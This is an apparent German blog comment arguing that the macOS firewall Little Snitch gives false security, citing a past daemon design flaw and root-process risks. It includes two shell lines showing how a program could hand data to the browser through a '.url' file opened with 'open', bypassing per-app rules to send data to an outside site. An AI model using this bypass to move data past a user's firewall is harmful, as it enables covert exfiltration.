… weil auf Deiner Seite garnichts zu little snitch steht.
…
Litte Snitch wurde in den letzten Versionen in einem Killer-Punkt korrigiert. Deswegen habe ich einen geplanten Artikel nicht geschrieben:
Anfangs lief sein Dämon unter dem jeweilig eingeloggten Benutzer. Dadurch konnte jedes Programm Little Snitch, genauergesagt dessen Dämon, aus- und anschalten und währenddessen ungestört "nach Hause telefonieren".
Es war außerdem ein Design-Fehler, einen Dämon unter einem Login-Account laufen zu lassen, weil ein Dämon nicht für einen speziellen User, sondern systemweite Aufgaben erledigt, und das geht mit einem Login-Account nicht, da der ja nicht immer aktiv ist.
Little Snitch wird gern als "Security"-Programm eingeordnet. Ich halte das für einfältig, denn betrachte mal folgendes Szenario:
Little Snitch benutzt Regeln, die festlegen, welches Programm auf welchem Port Daten rausschicken darf, meinetwegen auch noch an, wen es die schicken darf. Klingt gut, gelle?
So: Deinem Browser wirst Du jede ausgehende Kommunikation auf Port 80 erlauben müssen, egal wohin. Wenn nicht, ist Dein Browser praktisch nutzlos.
Es ist nun aber denkbar, daß ein "unartiges" Programm die Daten gar nicht selbst rausschickt, sondern dem Browser mitteilt, er möge eine bestimmte URL ansurfen und in der URL übergibt man dann ganz viele Daten. Das ist für den Browser technisch so, als wenn Du hier einen Kommentar postest. Die eigentliche Verbindung macht dann der Browser auf und die Daten schickt auch der Browser raus.
Beispiel: Im Terminal diesen Befehl, den jedes Programm absetzen könnte:
echo "URL=http://www.macmark.de?yourdata=all_your_base_is_belong_to_us" > badboy.url
Und dann diesen:
open badboy.url
Was passiert? Dein Browser schickt die angegebenen Daten an mich. Das funktioniert mutmaßlich auch mit aktivem Little Snitch. Mit Zeilenumbruch am Ende sollte es nicht nur auf OS X so klappen.
Man kann also leicht Little Snitch ausweichen. Ich habe das nicht selbst ausprobiert, aber vielleicht testet das mal jemand, der Little Snitch benutzt
Little Snitch installiert meines Wissens eine Kernel-Extension. Prozesse unter root sind immer beliebtes Angriffsziel. Fällt der Prozeß, ist das System meistens Toast (falls nicht sandboxed, siehe meine Seite). Hat Little Snitch einen Bug, hat man ein Problem, denn Little Snitch liest ja jeden ausgehenden Verkehr und ist damit leicht zu erreichen.
Frage: Blockt Little Snitch eigenen Nach-Hause-Verkehr? Vertraut man dem Entwickler des Programmes? Kann man in den Quellcode schauen?
Es gibt auch andere Wege, den Netzverkehr von Programmen zu überwachen, ohne Little Snitch: netstat, tcpdump etc. Alles Bordmittel.
Ich bin sehr vorsichtig damit, was ich als root laufen lasse. Little Snitch läuft bei mir jedenfalls nicht.
